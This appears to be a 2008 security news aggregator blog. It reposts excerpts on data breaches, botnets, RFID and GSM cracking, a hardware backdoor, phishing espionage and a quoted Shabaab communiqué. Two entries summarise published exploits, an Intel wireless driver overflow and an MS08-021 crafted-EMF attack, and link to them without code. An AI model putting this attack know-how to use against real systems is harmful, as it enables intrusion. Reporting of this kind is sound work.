Justice Department spokesman Erik Ablin said the collection of DNA samples "will provide an additional form of biometric identification from persons who would normally be fingerprinted." FBI rules preclude using DNA samples to determine a person's genetic traits, diseases or disorders.

The database expansion was authorized by Congress as an amendment to the Violence Against Women Act and was billed primarily as a way to track down serial rapists, murderers and other offenders. "We know for a fact that the proposed regulations will save the lives of many innocent people and will prevent devastating crimes," said Sen. Jon Kyl (R-Ariz.), a sponsor of the legislation. "These regulations are long overdue -- we should have done this 10 years ago."

The proposed rule applies to all federal agencies with the authority to arrest or detain, including the FBI, the Border Patrol and the Internal Revenue Service. Although details of the policy have not been announced, officials said they expect the bulk of the new DNA samples to be collected through cheek swabs.

-----------------------

So NASA, the IRS and the TSA at the airport can take my DNA?

I wonder if this is going in the Server in the sky?

Wow...bring on the CCTVs.

Information on Thousands of UM Patients Stolen

Via Miami Herald.com -

Computer tapes containing confidential information of 2.1 million University of Miami patients was stolen last month when thieves took a case out of a van used by a private off-site storage company, UM said Thursday morning

'' Anyone who has been a patient of a University of Miami physician or visited a UM facility since Jan. 1, 1999, is likely included on the tapes,'' the university said in a news release. ``The data included names, addresses, Social Security numbers or health information. The university will be notifying by mail the 47,000 patients whose data may have included credit card or other financial information regarding bill payment.''

The information was in a container holding computer back-up tapes. The container was removed from a vehicle in downtown Coral Gables on March 17, the storage company told UM.

''Shortly after learning of the incident, the university determined it would be unlikely that a thief would be able to access the backup tapes because of the complex and proprietary format in which they were written,'' UM said in the statement.

''Even so, the university engaged leading computer security experts at Terremark Worldwide to independently ascertain the feasibility of accessing and extracting data from a similar set of backup tapes,'' UM reported.

A Terremark executive, Christopher Day, said that after a week of trying to extract the data, it couldn't do so. ''Because of the highly proprietary compression and encoding used in writing the tapes, we were unable to extract any usable data,'' Day was quoted as saying in the news release.

UM then asked Alan Brill, senior managing director at Kroll Ontrack, to review the testing. ''While the report shows it is not impossible to access the data, in this case there are many barriers that stand between a thief and being able to actually get usable data from the tapes,'' the report quoted Brill as saying.

In its release, UM said it has created a website for information about the incident: www.dataincident.miami.edu. Patients can also contact a call center at 1-866-628-4492.

Massive Botnets Decried As Imminent National Threat

Via Wired.com -

Gangs of thousands of zombie home computers grinding out spam, committing fraud and overpowering websites are the most vexing net threat today, according to law enforcement and security professionals.

Today's botnet herders have hundreds of thousands of computers at their command and use technically sophisticated ways to hide their headquarters, making it easy for them to make millions from spam and credit card theft. They can also be used to direct floods of fake traffic at a targeted website in order to bring down a rival, extract protection money or less frequently, used to make a political point in the case of attacks on Estonia and the Church of Scientology.

Security pros and government officials are now describing the latter attacks, known as Distributed Denial of Service attacks, as serious threats to national security -- turning packet floods against public websites into the latest face of "cyberwar" hysteria.

Hence, the appearance Tuesday of a panel discussion at the RSA 2008 security conference entitled "Protecting the Homeland: Winning the Botnet Battle," which was marked by a mix of resignation, indignation and post-9/11 rhetoric.

Ronald Teixeira, the executive director of the non-profit National Cyber Security Alliance and the panel's moderator, began the discussion by describing botnets as "one of the largest threats we face on the internet today, and they can be used to attack critical infrastructure."

The Department of Homeland Security's representative Jordana Siegel, who works on public awareness at the National Cyber Security Division, echoed the line that botnets were a imminent threat to the nation's security.

Citing the attacks on Estonia last year by Russian nationalist hackers, Siegel said botnets can "disrupt an internet-reliant society," saying that the temporary takedown of Estonian newspaper and government websites "nearly crippled the country's cyber infrastructure." Earlier in the day, Homeland Security chief Michael Chertoff leaned on Estonia as evidence of the need for a federal government "Manhattan Project" for computer security.

Siegel said the DHS is working at fighting the problem, citing the annual October National Cyber Security Awareness month, which she said helped Americans learn that "all users need to practice safe online behavior."

Intel Centrino 2200BG Wireless Driver Probe Overflow

This [Metasploit] module exploits a stack overflow in the w22n51.sys driver provided with the Intel 2200BG integrated wireless adapter. This stack overflow allows remote code execution in kernel mode. The stack overflow is triggered when a 802.11 Probe response frame is received that contains multi vendor specific tag and "\x00" as essid and essid length element. This exploit was tested with version 8.0.12.20000 of the driver and an Intel Centrino 2200BG integrated wireless adapter. Newer versions of the w22n51.sys driver are provided from Intel to resolve this flaw.

Since this vulnerability is exploited via probe response frames, all cards within range of the attack will be affected. Vulnerable clients don't need to have their card in a particular state for this exploit to work.

Authors: oveRet & skape

http://www.milw0rm.com/exploits/5461

GSM Researcher Stopped at Heathrow Airport by UK Gov

Via THC Blog -

I was leaving today from the United Kingdom/Heathrow airport. I am about to speak at the HITB IT security conference about GSM security and the USRP (gnu-radio project).

I was searched by the UK government while waiting at the Gate and reading a newspaper. A UK Government employee flipped his badge and said "Let's talk. Come over here".

They detained my USRP (Software Defined Radio), my mobile phone and my personal SIM card.

They did their homework. They knew who I am, where i live, which day I speak at the conference and who I work for.

I'm involved in the GSM software project where we also developed a new attack against the GSM encryption A51. We published our research in February at the Blackhat security conference in Washington DC.

I understand that the government wanted to make sure that I'm not exporting any cryptanalytic device.

I did not. I will not. The USRP is a radio. My mobile phone is a normal nokia 3310 phone and my SIM card is a sim card.

They said they do not know what the USRP is and that I can not take it until they have checked it in the lab. This can take 14 days (1/2 month).

So be it. They have it for 14 days. Guys, enjoy the device! It's fun playing around with it!

I'm uneasy that they took my mobile phone and my sim card. Having a pregnant wife at home and not being reachable complicates my situation.

Is this common practice? Are they allowed to do this?
Any tips how I can get my mobile phone and my sim card back quicker?

Our project: http://wiki.thc.org/gsm
The USRP is available from http://www.ettus.com
The GNU RADIO project: http://www.gnu.org/software/gnuradio


stunning,

THC
---

Appendix: Surprisingly they did not detain my laptop or my paperwork which would be the most likely place to store any information related to cracking A51. They were also not interested in my 160GB harddrive which would have been the obvious place for storing the rainbow tables. Neither were they interested in the high performance FPGA chip.

Instead they took all equipment that could have been used for demonstrating that GSM signals can be received with publicly available hardware for 700 USD.

It does not appear that they were after cryptanalytic information.

I received a yellow paper about my detained goods. They left the field blank that reads
"The goods specified below are detained for the following reason:". What reason?

They also crossed out the field "Agent" of the officer who was in charge of the operation.

Humor: Florida Legalizes Taking Guns To Work

Via TheOnion -

Florida legislators passed a bill allowing citizens to bring their guns to work. Here are some of the other pro-gun laws enacted recently.

• Alaska—Members of endangered species now permitted to carry concealed firearms for self-protection
• Louisiana—Now legal for residents to shoot at hurricanes
• Minnesota—Any resident may fire a single shot every five years, or when Vikings win
• Idaho—You can have a gun, or a grenade, but not both
• Virginia—Non-gun-owning residents must apply for a permit to not own and operate a firearm
• New York—Guest stars on Law & Order may bring their own guns to the set
• Kansas—Children as young as 8 can bring guns to school on the condition that there's no funny business
• Texas—That huge cattle gun used by Javier Bardem's character in No Country For Old Men now legally available at Fiesta Mart grocery stores

----------------------------

More real information on this new law passed in FL. Check out these true media sources:

http://www.tampabay.com/news/politics/state/article452031.ece

http://news.yahoo.com/s/nm/20080409/pl_nm/usa_florida_guns_dc

http://www.floridacapitalnews.com/apps/pbcs.dll/article?AID=/20080404/CAPITOLNEWS/804040350

http://www.cnsnews.com/ViewNation.asp?Page=/Nation/archive/200804/NAT20080411a.html

Interbank FX Customers Data Exposed For Almost A Year

Via Cyberinsecure.com -

In April, 2007 an employee posted a file to an insecure server that was accessible via the Internet. The file contained personal information belonging to certain persons who applied for an Interbank FX account prior to April, 2007. Interbank FX became aware of the exposure only on March 28th, 2008.

The incident involved an electronic file dated April 2, 2007, which contained personal information provided by certain individuals who had applied for an Interbank FX account prior to that date. Around that time, an employee uploaded the file to a computer server accessible via the internet. The employee’s action was contrary to Interbank FX policies and procedures and compromised the security of the information in the file.

The file contained the information provided during opening of an account. This may include social security number, driver’s license, and passport information, and may also include Interbank FX account information.

Upon learning on March 28, 2008 that this information was available outside secured computing environment, the Company took immediate steps to secure the information. Interbank FX has thoroughly investigated the matter, has taken immediate steps to protect clients information, and is taking the additional precautions to assist monitoring and guarding the security of personal information. All files containing sensitive personal information were removed from the server and brought within the Company’s firewalls and electronic security controls.

The incident does not affect anyone who applied for an Interbank FX account after April 2, 2007.

As an additional precaution, clients are encouraged to change any password you created for your Interbank FX account prior to April 2, 2007. A toll-free hotline (800-550-1571) is available for questions and assist in signing up for the Equifax Credit WatchTM program.

SQL Injection: Oklahoma Dept of Corrections

Via thedailywtf.com -

One of the cardinal rules of computer programming is to never trust your input. This holds especially true when your input comes from users, and even more so when it comes from the anonymous, general public. Apparently, the developers at Oklahoma’s Department of Corrections slept through that day in computer science class, and even managed to skip all of Common Sense 101. You see, not only did they trust anonymous user input on their public-facing website, but they blindly executed it and displayed whatever came back.

The result of this negligently bad coding has some rather serious consequences: the names, addresses, and social security numbers of tens of thousands of Oklahoma residents were made available to the general public for a period of at least three years. Up until yesterday, April 13 2008, anyone with a web browser and the knowledge from Chapter One of SQL For Dummies could have easily accessed – and possibly, changed – any data within the DOC’s databases.

Malicious Microprocessor Opens Doors for Attack

Via Networkworld -

For years, hackers have focused on finding bugs in computer software that give them unauthorized access to computer systems, but now there's another way to break in: Hack the microprocessor.

On Tuesday, researchers at the University of Illinois at Urbana-Champaign demonstrated how they altered a computer chip to grant attackers back-door access to a computer. It would take a lot of work to make this attack succeed in the real world, but it would be virtually undetectable.

To launch its attack, the team used a special programmable processor running the Linux operating system. The chip was programmed to inject malicious firmware into the chip's memory, which then allows an attacker to log into the machine as if he were a legitimate user. To reprogram the chip, researchers needed to alter only a tiny fraction of the processor circuits. They changed 1,341 logic gates on a chip that has more than 1 million of these gates in total, said Samuel King, an assistant professor in the university's computer science department.

"This is like the ultimate back door," said King. "There were no software bugs exploited."

King demonstrated the attack on Tuesday at the Usenix Workshop on Large-Scale Exploits and Emergent Threats, a conference for security researchers held in San Francisco.

His team was able to add the back door by reprogramming a small number of the circuits on a LEON processor running the Linux operating system. These programmable chips are based on the same Sparc design that is used in Sun's midrange and high-end servers. They are not widely used, but have been deployed in systems used by the International Space Station.

In order to hack into the system, King first sent it a specially crafted network packet that instructed the processor to launch the malicious firmware. Then, using a special login password, King was able to gain access to the Linux system. "From the software's perspective, the packet gets dropped... and yet I have full and complete access to this underlying system that I just compromised," King said.

Russian Gov Enacts Byzantine WiFi Regulations

Via arstechnica.com -

It is often said that the opposite of progress is paperwork. The incomprehensibly self-defeating wastefulness and inefficiency of the legislatosaurus never ceases to depress me, but for once, America's idiocracy has been outdumbed by a Russian government agency which has proposed one of the most breathtakingly inane policies that I have ever had the misfortune of witnessing: mandatory registration of all WiFi devices.

According to Fontanka.ru, a Russian news source, the government agency responsible for regulating mass media, communications, and cultural protection has stated that users will have to register every WiFi-enabled device with the government and receive special permission in order to use the hardware. The agency says that registration could take as long as ten days for standard devices like PDAs and laptops and that it intends to confiscate devices that are used without registration. Users who wish to operate a wireless access point or WiFi-enabled home router are expected to go through an even more onerous process that will involve submitting documentation and obtaining a license. In certain regions, like Moscow and St. Petersburg, users will also have to receive special approval from the Federal Security Service.

The policy, which was explained to Fontanka.ru by the Russian agency's deputy director Vladimir Karpov, could reverse existing policies like a 2004 government panel decision to provide blanket permission for indoor wireless access point operation and a 2007 policy which allowed use of mobile WiFi devices without registration. According to The Other Russia, which provides an overview of the Fontanka.ru article in English as well as some additional details, the Russian government agency which is responsible for issuing the new policy was created when the Russian media and telecommunications regulatory bodies were merged last year.

The policy would likely be impossible to enforce and some question whether the government agency even has the authority to enforce it. WiFi technology is a powerful enabler of mobile connectivity and technological innovation. If regulatory policies broadly erode the availability of connectivity, the results could be disastrous for Russia's tech-savvy population. The policy reflects an abysmal understanding of WiFi's pervasiveness and utility and seems like arbitrary bureaucratic decision with no inherent purpose. Perhaps in Russia, unregulated WiFi is one of those accoutrements of capitalist imperialism that must be opposed with vigorous shoe-banging and similarly vigorous legislative action.

The Fontanka.ru article quotes an industry specialist who points out that the government agency behind the policy is run by a former metallurgic engineer who likely has no clue about many of the technical issues overseen by his organization. In this respect, Russia has much in common with the US, where lack of relevant experience often seems to be a prerequisite for public office, especially when it comes to regulating the series of tubes that make up the interwebs.

Merck Busted For Ghostwriting Vioxx Studies

Via injuryboard.com -

Drug maker, Merck & Co., has always characterized its conduct as above board and ethically appropriate among pharmaceutical companies.

“We employ rigorous scientific methods to design, conduct, analyze, and report results of clinical trials in the development of innovative drugs and vaccines, with a focus on meeting unmet medical needs and with an ethic that puts the interests of the patient first.”

That’s what the company says in a 2002 paper titled “ The practices of Merck & Co.

But what really goes on is another story.

Authors writing in this week’s issue of The Journal of the American Medical Association (JAMA) reveal how Merck manipulated dozens of publications to promote one of its products, ironically the painkiller Vioxx (rofecoxib).

Based on internal company documents revealed in Vioxx litigation, JAMA authors uncover how the company, without disclosing it, compensated ghostwriters who aren’t even doctors, to create articles for professional journals that have the potential to influence doctors and popularize drugs prescribed to the public.

In the 250 documents reviewed by the authors, Merck employees either working by themselves or in collaboration with a medical publishing company helped create the study on Vioxx.

They would then recruit academics or leaders in the medical field to lend their name as the lead author.

For scientific review papers, Merck would outline the plan for the manuscript then ghostwriters were hired from medical publishing companies, which typically pay about $20,000 per submission to the ghostwriter.

The scientist then recruited to be the named author would be offered “honoraria” for their participation.

This review in JAMA finds that among 96 published articles, 92 percent of clinical trials disclosed Merck’s financial support. But only half disclosed Merck’s involvement in the creation of the publication or whether the author had received compensation.

MiFare RFID Crack Takes Just Seconds

Via Computerworld -

The ubiquitous MiFare Classic RFID chip -- used daily by millions worldwide in access control keys, subway passes and other applications -- is even easier to crack than previously thought, according to security researchers who announced the development Tuesday at EuroCrypt, an international cryptography conference in Istanbul.

Mere seconds are all that is required to crack the chip's security -- not a few hours, as estimated last month. Karsten Nohl, a computer science graduate student and one of the masterminds behind reverse-engineering MiFare security, said in an interview that it now takes only 12 seconds to recover the key on a MiFare Classic card on an ordinary laptop.

On Monday, the Dutch government issued a final report arriving at the decisive conclusion that the chips, used by millions of citizens in the Netherlands, must be replaced. An earlier Dutch report had stated that a security breach on the MiFare cards was possible, but would be too unwieldy for the average attacker to accomplish.

"The attack is really, really cheap," Nohl said. "Before they [the Dutch government] argued that you would need expensive equipment; now we're talking a few seconds on any laptop, so anyone could do it."

Equally worrisome is that there is no need for the attacker to interact actively with the physical card itself. Passive eavesdropping suffices; the attack can take place from a distance. A passive attack from 10 meters away would take a little bit longer than an active attack, Nohl said -- about 200 seconds.

The attack works for any random number generator; it also works against the Crypto-1 cipher in the beefed-up MiFare Plus card.

Many major public transit systems around the world have made the switch from swipe cards to RFID-enabled "tap and go" cards. Switching to these RFID chips for subway passes means that anyone can potentially read a card -- even when the subway rider keeps it hidden in his pocket.

"It seems that all these wireless technologies are hyped for comfort, mostly," said Nohl. "Swiping a card is presented as cumbersome, whereas tapping a card is considered fancy and new. At the same time, these technologies are not really understood in terms of threat models."

The original announcement of the MiFare Classic chip security compromise was presented in December by Nohl and fellow researcher Henryk Plotz at the 24th Chaos Communication Congress hacker conference in Berlin.

New Intel on Al Qaeda's Western Recruits

Via CT Blog -

On the heels of CIA Director Gen. Mike Hayden's recent "Meet the Press" appearance, in which he disclosed that Al Qaeda is recruiting and training operatives who "look western" in order to penetrate the U.S., another top spook offered a few additional scraps of information about the new threat on Friday.

"There is attention being given to finding people who can live in the west, have lived in the west, comfortably, and who can appear western, wear western clothing," Charlie Allen, chief of intelligence and analysis at the Homeland Security Department, told reporters. "I'm talking about people who are Caucasian and non-Caucasian."

Allen, who spent decades as a top CIA official, said there was "a shift in Al Qaeda's strategy" after the late 2005 assassination of Al Qaeda's external operations commander, Abu Hamza Rabia.

According to recent congressional testimony by Director of National Intelligence Mike McConnell, it only took Osama Bin Laden's fanatics a mere six months to begin bringing western converts into Pakistan's lawless tribal areas for training. The New York Daily News reported last year that top counterterror officials fear the western-looking operatives can more easily penetrate U.S. security by blending in.

"I would think that you'd believe that Al Qaeda would look to Europe and to North America for such operatives. That's something to which we're very attentive," Allen said.

He also echoed recent comments Homeland Security Secretary Michael Chertoff made to The News, that no Al Qaeda operatives are known to have crossed the southern border from Mexico into the U.S. But, he added, "We do know that going back to 2004, the southern border is something Al Qaeda senior leadership has looked at."

Al-Shabaab Welcomes U.S. Terror Designation, Threatens New Campaign of "Praiseworthy Terrorism"

Via CT Blog -

The NEFA Foundation has obtained and translated a new communiqué released on April 5, 2008 by the Shabaab al-Mujahideen Movement in Somalia. The statement welcomed the recognition of Shabaab as an international terrorist organization by the U.S. government: "As we are a part of the Salafi-Jihadi Islamic trend which opposes the dominance of the crusaders and the aggression led by America, we do not find it unlikely that America would add us to the names of these other honorable men, for whom we are honored to join, at the bottom of their list.” The Shabaab also announced the beginning of a new military campaign inside Somalia under the slogan "Our Terrorism is Praiseworthy": "We swear to Allah that... we will only repeat what our late Shaykh Abu Musab al-Zarqawi once said: ‘we will not compromise on our religion, we will not change the way of jihad, and will not be satisfied with compromises. Between us and the infidels, there is only the sword of Islam.'" On February 29, 2008, the U.S. State Department designated Shabaab al-Mujahideen (a.k.a. the Mujahideen Youth Movement) as a Foreign Terrorist Organization and as a Specially Designated Global Terrorist. According to the U.S. State Department, the Shabaab movement includes “a number of individuals affiliated with al-Qaida. Many of its senior leaders are believed to have trained and fought with al-Qaida in Afghanistan.”

On a related note, the NEFA Foundation is also making available video footage of the "martyrdom will" of "Abu Ayyub al-Muhajir"--an English-speaking Somali national living in Europe, who recently returned to his homeland and executed a suicide car bombing in the city of Mogadishu on behalf of Shabaab al-Mujahideen. The video can be viewed on the NEFA Foundation website.

Gas Gang Uses 'Never-Before-Seen' Device To Hack, Steal From Pumps

Via Local6.com -

An elaborate organized theft ring is using a never-before-seen device to hack gas station pumps and steal unlimited amounts of gasoline in Central Florida, according to investigators in Casselberry.

At least five cars filled with members of the alleged gas-pump hackers were spotted bypassing pumps at a Hess station located on 17-92 in Casselberry late Monday.

"One of the operatives (got) out and used a computerized device to bypass the pumps so they could pump an unlimited amount of gas into the vehicles," Casselberry police Lt. Dennis Stewart said.

Stewart said the officers were noticed watching the crime.

"The group uses spotters and one of the spotters discovered the officers and went over and stuck her head in a window to determine that they were officers," Stewart said.

The woman then signaled the other vehicles, police said.

Investigators said the group scattered, jumping into their vehicles and driving in different directions.

One vehicle remained and tried to run over an officer, police said.

"He wound up striking the officer in the ribs and arm, knocking him backward," Stewart said.

Nearby officers stopped the vehicle as it left the area and arrested Chelsea Harris, 19, and Rhyeen Brinson, 25. Both were charged with felonies.

The other people at the gas station are still missing.

"We'd love to get our hands on the equipment and right now, particularly with one of our officers hit, we'd love to get our hands on the people."

The officer injured in the incident was expected to recover from his injuries.

Casselberry police said they had never seen the device or technology used to steal gasoline.

iPhone's Wi-Fi Positioning System Spoofed Using Laptop

Via Heise Security -

The Wi-Fi Positioning System (WPS) used by Apple's iPhone and iPod Touch and other mobile devices can easily be supplied with false information that makes the mobile think it's somewhere other than its true location. Researchers at the Swiss Federal Institute of Technology Zürich have found that all you need is a laptop, a Wi-Fi access point transmitter and a database of Wi-Fi access point locations.

The MAC address of an active Wi-Fi access point is continuously announced. WPS works by the client detecting the MAC addresses of nearby access points and comparing the cluster of found addresses with a database of clusters referred to geographical locations. The iPhone and iPod Touch apparently make use of the Skyhook Wireless Inc database of Wi-Fi access point locations, as do Nokia Symbian-based phones and PCs equipped with Skyhook's Loki plugin.

Unlike other positioning systems such as GSM, WPS does not triangulate, but instead looks for a specific location-dependent "signature". Professor Srdjan Capkun of the Zürich research team told heise online that WPS may use received signal strength as well, but this has not been confirmed officially. High positional accuracy – claimed to be in the order of 20m – is possible in dense urban locations such as major towns, where the close proximity of numerous Wi-Fi access points results in considerable overlap of their typical 100m radius of access.

But the simplistic WPS location strategy turns out to be its Achilles heel. The Zürich researchers found that they could readily jam the channels carrying real incoming Wi-Fi MAC announcements and substitute others of their own choosing on free channels – there being 13 available channels, not all of which will be in use at any one time and location. By transmitting the MAC address cluster of a distant location, they first fooled the iPhone into thinking they were across town from their real location. However the GSM capability of the iPhone overrides its WPS location capacity, so the researchers had to jam the GSM signal using an additional jammer device before they could carry out their most dramatic demonstration – an iPhone in Zürich that thought it was near the entrance to Holland Tunnel in New York City.

The researchers found that the Apple mobiles were not the only susceptible devices. They repeated the experiment successfully using the Loki plugin on a PC. They also point out that, by transmitting a cluster of MAC addresses belonging to access points that are not in the same geographical area, the localisation algorithm in a mobile device can be confused completely, effectively denying service to the user.

GAO: Stolen U.S. Military Gear Sold on eBay, Craigslist

Via ComputerWorld -

Stolen and sensitive U.S. military equipment, including body armor, night vision goggles, and gear to protect against nuclear or biochemical warfare, are being sold on Craigslist and eBay, a GAO report says.

The Government Accountability Office found many defense-related items for sale on Craigslist and eBay, according to the report, released last week.

After reviewing the policies and procedures for those Web sites, the GAO determined that there were few safeguards to prevent the sale of military items. Although it is not illegal to buy and sell some defense-related items in the U.S., many items are made solely for military use and are not meant for public use, the GAO said.

From January 2007 to March 2008, GAO undercover investigators were able to buy a dozen sensitive items on eBay and Craigslist to demonstrate how easy it was to obtain them, the agency said. Many of these items were stolen from the U.S. military, it said.

The items GAO investigators were able to purchase online include the following:

• Two F-14 aircraft components, including an antenna, from separate buyers on eBay. The GAO said that "F-14 components are in demand by Iran" and could be used by the Iranian military. "By making these components available to the general public, the eBay sellers provided an opportunity for these components to be purchased by an individual who could then transfer them to Iran," according to the report. "The continued ability of Iran to use its F-14s could put U.S. troops and allies at risk."
• Night vision goggles on eBay containing a sensitive component that allows U.S. service members to identify friendly fighters wearing infrared tabs on the battlefield.
• An Army combat uniform and accessories on eBay that could be used by a terrorist to pose as a U.S. service member.
• Body armor vests and small-arms protective inserts (SAPI) on eBay and Craigslist, including advanced enhanced SAPI plates used by U.S. troops in Iraq and Afghanistan.

Six College Cyber Defense Team Finalists Compete

Via DarkReading -

Texas A&M University looks to defend their National Champions title against five teams when the National Collegiate Cyber Defense Competition (NCCDC) takes place April 18-20 at the Hilton San Antonio Airport Hotel. The 3rd annual NCCDC is being hosted by the University of Texas at San Antonio's Center for Infrastructure Assurance and Security (CIAS), a nationally recognized leader in cyber security education and research.

The CCDC program has grown from five participating schools in 2005 to 56 schools in 2008 with six regional competitions taking place nationwide. The 2008 national competition features the 2007 defending champions, Texas A&M University, along with Baker College of Flint, Michigan, the Community College of Baltimore County, Mt. San Antonio College of Los Angeles County, Rochester Institute of Technology, and the University of Louisville. The participants advanced to the National CCDC after winning regional competitions against opposing teams in the Southwest, Midwest, Mid-Atlantic, Southeast and West Coast Regions.

The CCDC program is sponsored in part through donations from leading businesses in the communications and information technology industries.

"AT&T has always put an emphasis on technology and education," said AT&T president, Western Region, John T. Montford. "We are proud to support the NCCDC's competition that encourages students to find new and innovative ideas that benefit companies like AT&T and partner with UTSA to work toward an ever-advancing field of network security."

Psystar's Mac Clone Still Available For Purchase

Via InformationWeek -

A Miami-based system integrator has changed the name of an unauthorized Mac clone it's selling through its Web site from OpenMac to Open Computer -- and was continuing to take orders for the system as of Tuesday afternoon.

One version of Psystar's Open Computer featured Apple's Leopard OS X 10.5 operating system ported onto generic PC hardware that includes an Intel (NSDQ: INTC) Core2Duo processor at 2.66 GHz, a 250 GB hard drive and an Nvidia GeForce 8600 GT graphics card.

The system is priced at $804.99. A similar, Apple-branded computer would cost more than $2,000.

Psystar appears to have changed the name of its Mac clone overnight -- perhaps in response to anticipated legal pressure from Apple. Apple's end user license agreement forbids the installation or use of Leopard on third party hardware.

Business records show that Psystar is a small company operated by Miami residents Rodolfo Pedraza and Roberto Pedraza.

On Monday, a Psystar representative who would identify himself only as "Robert" said the company is not concerned about legal action by Apple. "We're not breaking any laws," Robert insisted in a telephone interview.

Psystar may be willing to have its right to sell Mac clones tested in court, Robert implied. "What if Microsoft (NSDQ: MSFT) said you could only install Windows on Dell (Dell) computers?," he said. "What if Honda said that, after you buy their car, you could only drive it on the roads they said you could?," he added.

Robert also accused Apple of marking up the hardware on which its operating systems run by as much as 80%.

While it's doubtful a small vendor like Psystar could withstand a legal assault by Apple on its own, the company could possibly draw support from interest groups that are opposed to restrictive software licenses and patents, or even from big hardware makers that, no doubt, would themselves relish the opportunity to market a Mac clone -- if only to counter Microsoft's influence on their business.

Psystar's Web site was up and running as of Tuesday afternoon. The site was offline much of Monday as news of the company's Mac clone spread across the Internet.

Exploit the MS08-021 : Stack Overflow on GDI API

Exploit the MS08-021 : Stack Overflow on GDI API

Author: Lamhtz

Date: April 14th, 2008

Usage: [filename]

Function: Generate a crafted emf file which could automatically run calc.exe in Win2kSP4 CHS Version with MS07-046 patched but no MS08-021 is installed. In Windows XP SP2, explorer.exe will crashed but calc will not be run.

http://www.milw0rm.com/exploits/5442

Bot breaks Hotmail's CAPTCHA in 6 seconds

Via NetworkWorld -

A new bot can crack defenses erected by Microsoft to keep spammers from creating large numbers of accounts on its Live Hotmail service within seconds, a security researcher said Friday.

Dan Hubbard, vice president of security research at Websense, said the bot broke Live Hotmail's CAPTCHA (Completely Automated Public Turing Test to Tell Computers and Humans Apart) within six seconds, on average. CAPTCHA is the name given to the distorted, scrambled characters that many Web services require users to decipher and type in to create a new account; the tests are meant to block automated account registration by spammers and malware authors.

The bot, Hubbard acknowledged, is similar to one Websense uncovered in February.

"In the past, though, it was kind of questionable whether the CAPTCHA breaking was automated," Hubbard said Friday, noting that there had been some evidence that spammers were paying people to decode and type in the CAPTCHA characters. "But the bot's breaking [CAPTCHA] in six seconds, so it's definitely automated."

In a long post to the Websense blog Thursday, Sumeet Prasad -- "our CAPTCHA expert," said Hubbard -- provided technical details of how the bot automatically registers Live Hotmail accounts and then immediately begins using those accounts to spew spam.

The bot's total response time -- how long it takes the program to grab a CAPTCHA image, analyze it and return with the correct code -- is considerably shorter than that of earlier such bots, said Prasad in the blog.

One in every eight to 10 attempts to create a Live Hotmail account is successful, added Prasad, meaning that the success rate is 10% to 15%. However, the rate is actually meaningless, said Hubbard, since the bot will continue to try to create accounts using a predetermined list of account names until they're all registered.

E-Passport Hacker Designs RFID Security Tool

Via Wired.com -

The team that produced the RFDump research/hacker tool for cloning and altering data stored on radio-frequency ID tags has now come out with a product to thwart RFID hackers.

German security researcher Lukas Grunwald, who made headlines two years ago for uncovering security vulnerabilities in new electronic passports being adopted by the U.S. and other countries, created RFDump with colleague Boris Wolf in 2004.

Now the two have created RF-Wall (shown on the lower shelf in the picture at right) to help thwart RFID fraud and attacks against e-passports, electronic access cards and payment cards -- such as the Mifare Classic card that is used in the London Underground and which security researchers recently cracked.

The device, which Grunwald and Wolf are producing for their new California-based company NeoCatena, is a hybrid firewall and intrusion-detection system that sits between an RFID reader and its back-end system. It's designed to detect counterfeit and cloned RFID chips and prevent an attacker from injecting malware into a back-end system with a rogue RFID chip. They'll be debuting the device this week at the RFID Journal Live conference in Las Vegas but gave me a demonstration of it this weekend.

The box can be loaded with virus signatures to detect known types of attacks and uses heuristics to detect other malicious activity, such as generic SQL-injection attacks (such as the one that appears in the screenshot above right). The device can be restricted to read only RFID cards that have specific serial numbers and reject all others. It also can be used to digitally sign chips so that any chips that are altered after being issued are rejected by the RFID reader. The system uses the HMAC algorithm for the digital signature. Grunwald and Wolf hold a patent on the use of HMAC with RFID technology.

Williamson County Woman Jailed for Cyber Fraud

Via KXAN.com (Austin) -

A Williamson County woman is in jail after police said she stole more than $213,000 in fraudulent reimbursement claims.

Lauri Jean Arrington worked as a software installer for a firm hired by Cadbury Adams. The company said Arrington installed a program to submit reimbursement.

Arrington then hacked the program and directed false claim reimbursements to two personal bank accounts in Williamson County.

Police said Arrington stole the money over three years, from March 2005 to March 2008.

She faces three felony charges.

E-spionage: Phishing for Classified Data

Via BusinessWeek -

The e-mail message addressed to a Booz Allen Hamilton executive was mundane—a shopping list sent over by the Pentagon of weaponry India wanted to buy. But the missive turned out to be a brilliant fake. Lurking beneath the description of aircraft, engines, and radar equipment was an insidious piece of computer code known as "Poison Ivy" designed to suck sensitive data out of the $4 billion consulting firm's computer network.

The Pentagon hadn't sent the e-mail at all. Its origin is unknown, but the message traveled through Korea on its way to Booz Allen. Its authors knew enough about the "sender" and "recipient" to craft a message unlikely to arouse suspicion. Had the Booz Allen executive clicked on the attachment, his every keystroke would have been reported back to a mysterious master at the Internet address cybersyndrome.3322.org, which is registered through an obscure company headquartered on the banks of China's Yangtze River.

The U.S. government, and its sprawl of defense contractors, have been the victims of an unprecedented rash of similar cyber attacks over the last two years, say current and former U.S. government officials. "It's espionage on a massive scale," says Paul B. Kurtz, a former high-ranking national security official. Government agencies reported 12,986 cyber security incidents to the U.S. Homeland Security Dept. last fiscal year, triple the number from two years earlier. Incursions on the military's networks were up 55% last year, says Lieutenant General Charles E. Croom, head of the Pentagon's Joint Task Force for Global Network Operations. Private targets like Booz Allen are just as vulnerable and pose just as much potential security risk. "They have our information on their networks. They're building our weapon systems. You wouldn't want that in enemy hands," Croom says. Cyber attackers "are not denying, disrupting, or destroying operations—yet. But that doesn't mean they don't have the capability."

Google Shares its Security Secrets

Via ITNews.com.au -

Google is offering security professionals a look into its security systems.

Scott Petry, director of Google's Enterprise and founder of security firm Postini, explained to attendees at the RSA conference how the company handles constant pressure and scrutiny from attackers.

"Google is a very very high-value target," Petry noted.

"If you have bad intentions and want to get a reputation, hacking Google is the best way to get credibility on the streets."

In order to keep its products safe, Google has adopted a philosophy of 'security as a cultural value'. The programme includes mandatory security training for developers, a set of in-house security libraries, and code reviews both by Google developers and outside security researchers.
"The most important thing that our security team does is educate," Petry explained.

"Educating people is the most important thing a security professional can do. "

Petry contended that in an age where both users and companies are increasingly relying on outside services and applications, it is becoming nearly impossible to fully lock-down a company.

"IT is largely fighting yesterday's battle," he said, in reference to the policy of trying to restrict all user access.

"Start saying okay, if these things are going to happen, do an assessment to try and bound the risk."

Petry noted that in addition to educating its employees, the company also implements software 'guard rails', which warn users when potentially risky actions are taken and later logs them for administrators to archive.

For software developers, Petry also suggested taking a 'neighbourhood watch', approach to vulnerability disclosure. For Google, this means sharing more information with researchers and trusting them to do the right thing with their discoveries.

